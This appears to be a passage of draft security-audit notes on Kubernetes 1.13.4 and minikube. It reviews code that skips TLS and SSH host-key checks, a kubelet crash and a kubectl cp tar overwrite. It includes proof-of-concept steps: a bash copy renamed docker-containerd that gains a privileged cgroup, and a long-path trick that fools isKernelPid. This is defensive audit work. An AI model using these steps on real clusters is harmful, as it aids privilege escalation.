func (l *SSHTunnelList) healthCheck(e sshTunnelEntry) error {
// GET the healthcheck path using the provided tunnel's dial function.
transport := utilnet.SetTransportDefaults(&http.Transport{
DialContext: e.Tunnel.Dial,
// TODO(cjcullen): Plumb real TLS options through.
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
// We don't reuse the clients, so disable the keep-alive to properly
// close the connection.
DisableKeepAlives: true,
})
client := &http.Client{Transport: transport}
resp, err := client.Get(l.healthCheckURL.String())
if err != nil {
return err
}
resp.Body.Close()
return nil
}
src/kubernetes-1.13.4/staging/src/k8s.io/apimachinery/pkg/util/proxy/dial.go:58
- in DialURL
- although they warn about it: if dialer != nil {
// We have a dialer; use it to open the connection, then
// create a tls client using the connection.
netConn, err := dialer(ctx, "tcp", dialAddr)
if err != nil {
return nil, err
}
if tlsConfig == nil {
// tls.Client requires non-nil config
klog.Warningf("using custom dialer with no TLSClientConfig. Defaulting to InsecureSkipVerify")
// tls.Handshake() requires ServerName or InsecureSkipVerify
tlsConfig = &tls.Config{
InsecureSkipVerify: true,
}
src/kubernetes-1.13.4/staging/src/k8s.io/apiserver/pkg/server/storage/storage_factory.go:290
:// Backends returns all backends for all registered storage destinations.
// Used for getting all instances for health validations.
func (s *DefaultStorageFactory) Backends() []Backend {
servers := sets.NewString(s.StorageConfig.ServerList...)
for _, overrides := range s.Overrides {
servers.Insert(overrides.etcdLocation...)
}
tlsConfig := &tls.Config{
InsecureSkipVerify: true,
}
src/kubernetes-1.13.4/staging/src/k8s.io/kube-aggregator/pkg/controllers/status/available_controller.go:99
: // construct an http client that will ignore TLS verification (if someone owns the network and messes with your status
// that's not so bad) and sets a very short timeout.
discoveryClient := &http.Client{
Transport: &http.Transport{
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
},
// the request should happen quickly.
Timeout: 5 * time.Second,
}
src/minikube-0.35.0/pkg/minikube/bootstrapper/kubeadm/kubeadm.go:123
:func (k *KubeadmBootstrapper) GetApiServerStatus(ip net.IP) (string, error) {
url := fmt.Sprintf("https://%s:%d/healthz", ip, util.APIServerPort)
// To avoid: x509: certificate signed by unknown authority
tr := &http.Transport{
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
}
When kubelet
is running and docker engine is used as container runtime the dockershim container manager (pkg/kubelet/dockershim/cm/container_manager_linux.go
) ensures that docker and docker-containerd processes are in manager's cgroup every 5 minutes.
This action is scheduled every 5 minutes when dockershim container manager is started:
func (m *containerManager) Start() error {
// TODO: check if the required cgroups are mounted.
if len(m.cgroupsName) != 0 {
manager, err := createCgroupManager(m.cgroupsName)
if err != nil {
return err
}
m.cgroupsManager = manager
}
go wait.Until(m.doWork, 5*time.Minute, wait.NeverStop)
return nil
}
And the doWork
calls EnsureDockerInContainer
- note that by the "container" we mean a cgroup here:
func (m *containerManager) doWork() {
// (...)
// EnsureDockerInContainer does two things.
// 1. Ensure processes run in the cgroups if m.cgroupsManager is not nil.
// 2. Ensure processes have the OOM score applied.
if err := kubecm.EnsureDockerInContainer(version, dockerOOMScoreAdj, m.cgroupsManager); err != nil {
klog.Errorf("Unable to ensure the docker processes run in the desired containers: %v", err)
}
}
This function (EnsureDockerInContainer
defined in
pkg/kubelet/cm/container_manager_linux.go:711
) gets pids of all docker
and docker-containerd
processes by using getPidsForProcess
. It does it by first trying to get the pid from hardcoded pidfile, which is:
"/var/run/docker.pid"
for docker
"/run/docker/libcontainerd/docker-containerd.pid"
for docker-containerd
procfs.PidOf
which finds finds the process by iterating over all processes in /proc
and trying to match a regular expression with their name, retrieved from /proc/<pid>/cmdline
.The problem occurs when we omit the pidfile and check for process name as any user can spawn a process with given name.
TODO FIXME: write the rest of it
/run/docker/libcontainerd/docker-containerd.pid
- the attack works only on systems where it is not there.docker-containerd
/systemd/system.slice
cgroup for certain resources.vagrant@k8s-2:~$ sudo cat "/run/docker/libcontainerd/docker-containerd.pid"
cat: /run/docker/libcontainerd/docker-containerd.pid: No such file or directory
vagrant@k8s-2:~$ cp /bin/bash ./docker-containerd
vagrant@k8s-2:~$ ./docker-containerd
vagrant@k8s-2:~$ date
Fri Apr 5 08:03:37 PDT 2019
vagrant@k8s-2:~$ cat /proc/$$/cgroup
12:freezer:/
11:cpuset:/
10:blkio:/user.slice
9:net_cls,net_prio:/
8:perf_event:/
7:cpu,cpuacct:/user.slice
6:hugetlb:/
5:rdma:/
4:devices:/user.slice
3:pids:/user.slice/user-1000.slice/session-9.scope
2:memory:/user.slice
1:name=systemd:/user.slice/user-1000.slice/session-9.scope
0::/user.slice/user-1000.slice/session-9.scope
vagrant@k8s-2:~$ date
Fri Apr 5 08:08:28 PDT 2019
vagrant@k8s-2:~$ cat /proc/$$/cgroup
12:freezer:/systemd/system.slice
11:cpuset:/systemd/system.slice
10:blkio:/systemd/system.slice
9:net_cls,net_prio:/systemd/system.slice
8:perf_event:/systemd/system.slice
7:cpu,cpuacct:/systemd/system.slice
6:hugetlb:/systemd/system.slice
5:rdma:/
4:devices:/systemd/system.slice
3:pids:/systemd/system.slice
2:memory:/systemd/system.slice
1:name=systemd:/systemd/system.slice
0::/user.slice/user-1000.slice/session-9.scope
So another attack here is that:
As a result: the process is root and is in a cgroup that has more access: i.e. access to all devices. Since it is root, maybe he can privesc to root on host? It might be blocked by apparmor, but this has to be checked.
// rotateLatestLog rotates latest log without compression, so that container can still write
// and fluentd can finish reading.
func (c *containerLogManager) rotateLatestLog(id, log string) error {
timestamp := c.clock.Now().Format(timestampFormat)
rotated := fmt.Sprintf("%s.%s", log, timestamp)
if err := os.Rename(log, rotated); err != nil {
return fmt.Errorf("failed to rotate log %q to %q: %v", log, rotated, err)
}
if err := c.runtimeService.ReopenContainerLog(id); err != nil {
// Rename the rotated log back, so that we can try rotating it again
// next round.
// If kubelet gets restarted at this point, we'll lose original log.
if renameErr := os.Rename(rotated, log); renameErr != nil {
// This shouldn't happen.
// Report an error if this happens, because we will lose original
// log.
klog.Errorf("Failed to rename rotated log %q back to %q: %v, reopen container log error: %v", rotated, log, renameErr, err)
}
return fmt.Errorf("failed to reopen container log %q: %v", id, err)
}
return nil
}
// Try to unmount mounted directories under kubeadmconstants.KubeletRunDirectory in order to be able to remove the kubeadmconstants.KubeletRunDirectory directory later
fmt.Printf("[reset] unmounting mounted directories in %q\n", kubeadmconstants.KubeletRunDirectory)
umountDirsCmd := fmt.Sprintf("awk '$2 ~ path {print $2}' path=%s /proc/mounts | xargs -r umount", kubeadmconstants.KubeletRunDirectory)
klog.V(1).Infof("[reset] executing command %q", umountDirsCmd)
umountOutputBytes, err := exec.Command("sh", "-c", umountDirsCmd).Output()
This is just a code quality issue/info.
in pkg/kubectl/cmd/util/editor/editor.go:163
:
func tempFile(prefix, suffix string) (f *os.File, err error) {
dir := os.TempDir()
for i := 0; i < 10000; i++ {
name := filepath.Join(dir, prefix+randSeq(5)+suffix)
f, err = os.OpenFile(name, os.O_RDWR|os.O_CREATE|os.O_EXCL, 0600)
if os.IsExist(err) {
continue
}
break
}
return
}
This could just use https://golang.org/pkg/io/ioutil/#TempFile which uses very similar code https://golang.org/src/io/ioutil/tempfile.go ๐ค
Btw this is used in pkg/kubectl/cmd/util/editor/editor.go:143
:
// LaunchTempFile reads the provided stream into a temporary file in the given directory
// and file prefix, and then invokes Launch with the path of that file. It will return
// the contents of the file after launch, any errors that occur, and the path of the
// temporary file so the caller can clean it up as needed.
func (e Editor) LaunchTempFile(prefix, suffix string, r io.Reader) ([]byte, string, error) {
f, err := tempFile(prefix, suffix)
if err != nil {
return nil, "", err
}
defer f.Close()
path := f.Name()
if _, err := io.Copy(f, r); err != nil {
os.Remove(path)
return nil, path, err
}
// This file descriptor needs to close so the next process (Launch) can claim it.
f.Close()
if err := e.Launch(path); err != nil {
return nil, path, err
}
bytes, err := ioutil.ReadFile(path)
return bytes, path, err
}
and while there is a race condition/TOCTOU between closing and later reopening the file in editor (fetched via EDITOR
or KUBE_EDITOR
envvar):
// This file descriptor needs to close so the next process (Launch) can claim it.
f.Close()
if err := e.Launch(path); err != nil {
I believe it is a non-issue as the file was created with 0600
chmods (so only it's owner has RW).
We've seen many places that a raw path is just accepted from a config file and written to; would be easy to set the path to /root/.ssh/authorized_keys
or w/e.
// compressLog compresses a log to log.gz with gzip.
func (c *containerLogManager) compressLog(log string) error {
r, err := os.Open(log)
if err != nil {
return fmt.Errorf("failed to open log %q: %v", log, err)
}
defer r.Close()
tmpLog := log + tmpSuffix
f, err := os.OpenFile(tmpLog, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0644)
if err != nil {
return fmt.Errorf("failed to create temporary log %q: %v", tmpLog, err)
}
defer func() {
// Best effort cleanup of tmpLog.
os.Remove(tmpLog)
}()
defer f.Close()
w := gzip.NewWriter(f)
defer w.Close()
if _, err := io.Copy(w, r); err != nil {
return fmt.Errorf("failed to compress %q to %q: %v", log, tmpLog, err)
}
compressedLog := log + compressSuffix
if err := os.Rename(tmpLog, compressedLog); err != nil {
return fmt.Errorf("failed to rename %q to %q: %v", tmpLog, compressedLog, err)
}
// Remove old log file.
if err := os.Remove(log); err != nil {
return fmt.Errorf("failed to remove log %q after compress: %v", log, err)
}
return nil
}
When faulting Kubelet with KRF, a hard crash was encountered.
E0320 19:31:54.493854 6450 fs.go:591] Failed to read from stdout for cmd [ionice -c3 nice -n 19 du -s /var/lib/docker/overlay2/bbfc9596c0b12fb31c70db5ffdb78f47af303247bea7b93eee2cbf9062e307d8/diff] - read |0: bad file descriptor
panic: runtime error: index out of range
goroutine 289 [running]:
k8s.io/kubernetes/vendor/github.com/google/cadvisor/fs.GetDirDiskUsage(0xc001192c60, 0x5e, 0x1bf08eb000, 0x1, 0x0, 0xc0011a7188)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/github.com/google/cadvisor/fs/fs.go:600 +0xa86
k8s.io/kubernetes/vendor/github.com/google/cadvisor/fs.(*RealFsInfo).GetDirDiskUsage(0xc000bdbb60, 0xc001192c60, 0x5e, 0x1bf08eb000, 0x0, 0x0, 0x0)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/github.com/google/cadvisor/fs/fs.go:565 +0x89
k8s.io/kubernetes/vendor/github.com/google/cadvisor/container/common.(*realFsHandler).update(0xc000ee7560, 0x0, 0x0)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/github.com/google/cadvisor/container/common/fsHandler.go:82 +0x36a
k8s.io/kubernetes/vendor/github.com/google/cadvisor/container/common.(*realFsHandler).trackUsage(0xc000ee7560)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/github.com/google/cadvisor/container/common/fsHandler.go:120 +0x13b
created by k8s.io/kubernetes/vendor/github.com/google/cadvisor/container/common.(*realFsHandler).Start
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/github.com/google/cadvisor/container/common/fsHandler.go:142 +0x3f
This crash occurs due to improper error handling of a disk usage function GetDirDiskUsage
.
func GetDirDiskUsage(dir string, timeout time.Duration) (uint64, error) {
if dir == "" {
return 0, fmt.Errorf("invalid directory")
}
cmd := exec.Command("ionice", "-c3", "nice", "-n", "19", "du", "-s", dir)
stdoutp, err := cmd.StdoutPipe()
if err != nil {
return 0, fmt.Errorf("failed to setup stdout for cmd %v - %v", cmd.Args, err)
}
stderrp, err := cmd.StderrPipe()
if err != nil {
return 0, fmt.Errorf("failed to setup stderr for cmd %v - %v", cmd.Args, err)
}
if err := cmd.Start(); err != nil {
return 0, fmt.Errorf("failed to exec du - %v", err)
}
timer := time.AfterFunc(timeout, func() {
klog.Warningf("Killing cmd %v due to timeout(%s)", cmd.Args, timeout.String())
cmd.Process.Kill()
})
stdoutb, souterr := ioutil.ReadAll(stdoutp)
if souterr != nil {
klog.Errorf("Failed to read from stdout for cmd %v - %v", cmd.Args, souterr)
}
stderrb, _ := ioutil.ReadAll(stderrp)
err = cmd.Wait()
timer.Stop()
if err != nil {
return 0, fmt.Errorf("du command failed on %s with output stdout: %s, stderr: %s - %v", dir, string(stdoutb), string(stderrb), err)
}
stdout := string(stdoutb)
usageInKb, err := strconv.ParseUint(strings.Fields(stdout)[0], 10, 64)
if err != nil {
return 0, fmt.Errorf("cannot parse 'du' output %s - %s", stdout, err)
}
return usageInKb * 1024, nil
}
Within this function, the ionice
function is executed, and the standard out and standard error is read in. When reading the standard out and standard error, there is a lack of error handling. When reading from standard out, if there is an error, it is only logged as unable to be read from.
stdoutb, souterr := ioutil.ReadAll(stdoutp)
if souterr != nil {
klog.Errorf("Failed to read from stdout for cmd %v - %v", cmd.Args, souterr)
}
Execution then continues after the error, with stdoutb
being empty. This results in a panic when later on in the function, an attempt is made to index stdout
(a string
casted stdoutb
).
usageInKb, err := strconv.ParseUint(strings.Fields(stdout)[0], 10, 64)
WithInsecure
func newGrpcConn(addr csiAddr) (*grpc.ClientConn, error) {
network := "unix"
klog.V(4).Infof(log("creating new gRPC connection for [%s://%s]", network, addr))
return grpc.Dial(
string(addr),
grpc.WithInsecure(),
grpc.WithDialer(func(target string, timeout time.Duration) (net.Conn, error) {
return net.Dial(network, target)
}),
)
}
In pkg/kubelet/cm/container_manager_linux.go:869
:
// Determines whether the specified PID is a kernel PID.
func isKernelPid(pid int) bool {
// Kernel threads have no associated executable.
_, err := os.Readlink(fmt.Sprintf("/proc/%d/exe", pid))
return err != nil
}
This check is incorrect as it doesn't care about the resulting error.
This can be easily attacked by placing the binary in an arbitrary long path.
This can be tested with this simple go program, compiled as go build is_kernel_pid.go
:
package main
import (
"fmt"
"os"
)
func main() {
fmt.Printf("isKernelPid(os.GetPid()) = %v\n", isKernelPid(os.Getpid()))
}
// Determines whether the specified PID is a kernel PID.
func isKernelPid(pid int) bool {
// Kernel threads have no associated executable.
_, err := os.Readlink(fmt.Sprintf("/proc/%d/exe", pid))
return err != nil
}
And then triggering the attack by moving the resulting binary to an arbitrary long path - by executing this command many times:
mkdir `python -c 'print("A"*250)'` && mv ./is_kernel_pid ./AA* && cd ./AA*
and then executing the binary:
$ pwd
/home/dc/gohacks/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
$ ./is_kernel_pid
isKernelPid(os.GetPid()) = true
$ strace -e readlinkat ./is_kernel_pid
readlinkat(AT_FDCWD, "/proc/self/exe", 0xc420022080, 128) = -1 ENAMETOOLONG (File name too long)
readlinkat(AT_FDCWD, "/proc/6961/exe", 0xc420022100, 128) = -1 ENAMETOOLONG (File name too long)
isKernelPid(os.GetPid()) = true
things like:
pkg/controller/certificates/signer/cfssl_signer.go
79: strPassword := os.Getenv("CFSSL_CA_PK_PASSWORD")
The trust of the TAR implementation within a pod for kubectl cp
can lead to unexpected overwriting of files of the user running the command.
1.13.4, 1.13.5, 1.14.0
If we consider the following command being run:
$ kubectl cp kube-system/kube-scheduler-kind-control-plane:/var/log/log.txt .
We would expect either a single file with the name log.txt
or an error. However, if the pod has a malicious TAR implementation, it can receive an arbitrary number of files that will be processed and can overwrite anything in the destination directory.
kubectl
attempts to do some validation to ensure it does not escape the destination directory which appears sufficient (once symlink bugs are resolved).
if !strings.HasPrefix(header.Name, prefix) {
return fmt.Errorf("tar contents corrupted")
}
Exploitation is difficult without specifying a target environment. On UNIX environments, files are created without executable permissions, so exploitation would require techniques like overwriting .profile
or similar if run from ~
.
On Windows environments, it could place a DLL in the current working directory (if using a destination of .
) which could enable potential DLL hijacking attacks. Even if a destination directory is provided, the attacker could place a .LNK files and cause NetNTLM hashes to be sent to a remote server when that directory is browsed.
The Kubernetes docs give the following guidance regarding data storage and encryption
These recommendations are not accurate from a cryptographic perspective and may lead to users making unsafe choices both in Kubernetes and elsewhere.
The default encryption option for users should be SecretBox. It is both more secure and faster than AES-CBC. Users should be encouraged to use KMS whenever possible. We believe these should be the only two options users are given. AES-GCM is secure, but as the docs point out, requires frequent key rotation to avoid nonce reuse attacks. Finally, AES-CBC is vulnerable to padding oracle attacks and should be depreciated. While Kubernetes itself doesn't lend itself well to a padding oracle attack, AES-CBC being the recommended algorithm both spreads misconceptions about cryptographic security and promotes a strictly worse choice than Secretbox.
This issue was also discussed in kubernetes/kubernetes#73514.
We can start here, but I think more container-type stuff will fall out eventually.
File Perms
TLDR: There are two usages of ssh.InsecureIgnoreHostKey
in Kubernetes and one in Minikube.
TODO:
So there is some option to tunnel apiserver-kubelet communication via ssh. Is it secure?
makeSSHTunnel
(src/kubernetes-1.13.4/pkg/ssh/ssh.go:102
) which is called by NewSSHTunnelFromBytes
and NewSSHTunnel
.func makeSSHTunnel(user string, signer ssh.Signer, host string) (*SSHTunnel, error) {
config := ssh.ClientConfig{
User: user,
Auth: []ssh.AuthMethod{ssh.PublicKeys(signer)},
HostKeyCallback: ssh.InsecureIgnoreHostKey(),
}
NewSSHTunnelFromBytes
is only called by pkg/ssh/ssh_test.go
so it is not interesting (I haven't analyzed it more) as it appears to be in testsLet's analyze NewSSHTunnel
:
func (*realTunnelCreator) NewSSHTunnel(user, keyFile, healthCheckURL string) (tunnel, error)
func NewSSHTunnelList(user, keyfile string, healthCheckURL *url.URL, stopChan chan struct{}) *SSHTunnelList
pkg/master/tunneler/ssh.go:135
:// Run establishes tunnel loops and returns
func (c *SSHTunneler) Run(getAddresses AddressFunc) {
// (...)
c.tunnels = ssh.NewSSHTunnelList(c.SSHUser, c.SSHKeyfile, c.HealthCheckURL, c.stopChan)
Run
is called in src/kubernetes-1.13.4/pkg/master/master.go:385
:func (m *Master) installTunneler(nodeTunneler tunneler.Tunneler, nodeClient corev1client.NodeInterface) {
nodeTunneler.Run(nodeAddressProvider{nodeClient}.externalAddresses)
src/kubernetes-1.13.4/pkg/master/master.go:294
:// New returns a new instance of Master from the given config.
// Certain config fields will be set to a default value if unset.
// Certain config fields must be specified, including:
// KubeletClientConfig
func (c completedConfig) New(delegationTarget genericapiserver.DelegationTarget) (*Master, error) {
// (...)
m.InstallAPIs(c.ExtraConfig.APIResourceConfigSource, c.GenericConfig.RESTOptionsGetter, restStorageProviders...)
if c.ExtraConfig.Tunneler != nil {
m.installTunneler(c.ExtraConfig.Tunneler, corev1client.NewForConfigOrDie(c.GenericConfig.LoopbackClientConfig).Nodes())
}
m.GenericAPIServer.AddPostStartHookOrDie("ca-registration", c.ExtraConfig.ClientCARegistrationHook.PostStartHook)
return m, nil
}
I think this is called for master apiserver and we may specify the ssh tunneling in the config. This must be confirmed tho.
runSSHCommand
called by RunSSHCommand
. This code is called only by test/e2e/framework/util.go
so I believe it is only used for testing - so we probably don't want to report this one.// Internal implementation of runSSHCommand, for testing
func runSSHCommand(dialer sshDialer, cmd, user, host string, signer ssh.Signer, retry bool) (string, string, int, error) {
if user == "" {
user = os.Getenv("USER")
}
// Setup the config, dial the server, and open a session.
config := &ssh.ClientConfig{
User: user,
Auth: []ssh.AuthMethod{ssh.PublicKeys(signer)},
HostKeyCallback: ssh.InsecureIgnoreHostKey(),
}
TLDR: It seems they use this when ssh
binary is not found and if the default client type is Native
- in src/minikube-0.35.0/vendor/github.com/docker/machine/libmachine/ssh/client.go:131
:
func NewNativeConfig(user string, auth *Auth) (ssh.ClientConfig, error) {
var (
authMethods []ssh.AuthMethod
)
for _, k := range auth.Keys {
key, err := ioutil.ReadFile(k)
if err != nil {
return ssh.ClientConfig{}, err
}
privateKey, err := ssh.ParsePrivateKey(key)
if err != nil {
return ssh.ClientConfig{}, err
}
authMethods = append(authMethods, ssh.PublicKeys(privateKey))
}
for _, p := range auth.Passwords {
authMethods = append(authMethods, ssh.Password(p))
}
return ssh.ClientConfig{
User: user,
Auth: authMethods,
HostKeyCallback: ssh.InsecureIgnoreHostKey(),
}, nil
}
anyway, since minikube is for local cluster I don't think it is important issue.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
